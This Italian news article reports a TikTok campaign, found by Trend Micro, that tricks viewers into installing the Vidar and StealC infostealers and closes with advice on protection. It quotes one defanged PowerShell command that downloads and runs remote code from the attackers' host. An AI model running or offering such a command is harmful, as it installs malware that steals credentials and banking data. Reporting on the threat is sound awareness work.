Allarme su TikTok: con un video virale ci svuotano il conto in banca

La sicurezza informatica è un tema sempre più centrale, e l’ultima minaccia che coinvolge TikTok lo dimostra chiaramente. Una nuova campagna di attacchi sta sfruttando la popolarità della piattaforma per diffondere sofisticati malware, come Vidar e StealC, mettendo in pericolo i dati personali di migliaia di utenti. Video apparentemente innocui, che raggiungono milioni di visualizzazioni grazie all’algoritmo di TikTok, si rivelano in realtà strumenti per compromettere la sicurezza degli utenti.

Un’indagine condotta da Trend Micro ha rivelato i dettagli di questa strategia malevola. I cybercriminali pubblicano contenuti ingannevoli che attirano l’attenzione degli utenti e li spingono a compiere azioni pericolose. Uno dei video incriminati ha superato il mezzo milione di visualizzazioni, dimostrando l’efficacia di questa tattica nell’amplificare il potenziale danno.

La sofisticata strategia d’attacco

Gli esperti hanno individuato un account sospetto, @gitallowed, che pubblica tutorial apparentemente utili ma in realtà ingannevoli. Questi video invitano gli utenti a eseguire comandi PowerShell che sembrano innocui, come:

iex (irm hxxps://allaivo[.]me/spotify)

Dietro questa semplice stringa si cela un processo complesso e dannoso: vengono create directory nascoste, disattivate le protezioni di Windows Defender, installati software malevoli e cancellate le tracce per evitare il rilevamento. Questo approccio rappresenta una combinazione pericolosa di social engineering e tecniche di attacco tradizionali, rendendo difficile l’intercettazione da parte dei sistemi di sicurezza convenzionali.

Un nuovo paradigma di minaccia

Questa nuova tipologia di attacco è particolarmente insidiosa per la sua natura ibrida. L’unico momento in cui può essere rilevata è durante l’esecuzione del comando PowerShell, ma a quel punto l’attacco è già in corso. Gli infostealer distribuiti attraverso questa campagna sono progettati per sottrarre credenziali, dati bancari e altre informazioni sensibili, causando gravi conseguenze sia per gli utenti privati che per le aziende.

La crescente sofisticazione di queste minacce dimostra come i social media stiano diventando un terreno di caccia ideale per i criminali informatici. L’abilità di sfruttare piattaforme come TikTok per distribuire malware segna un cambiamento significativo nel panorama della cybersecurity, richiedendo nuove strategie di difesa.

Contromisure efficaci

La consapevolezza rimane la prima linea di difesa contro queste minacce. Gli esperti raccomandano alcune misure chiave per proteggersi:

• Non eseguire mai comandi sconosciuti, indipendentemente dalla fonte
• Mantenere aggiornati i sistemi operativi e i software di sicurezza
• Implementare soluzioni di monitoraggio comportamentale sui dispositivi aziendali
• Promuovere programmi di formazione sulla cybersecurity per aumentare la consapevolezza degli utenti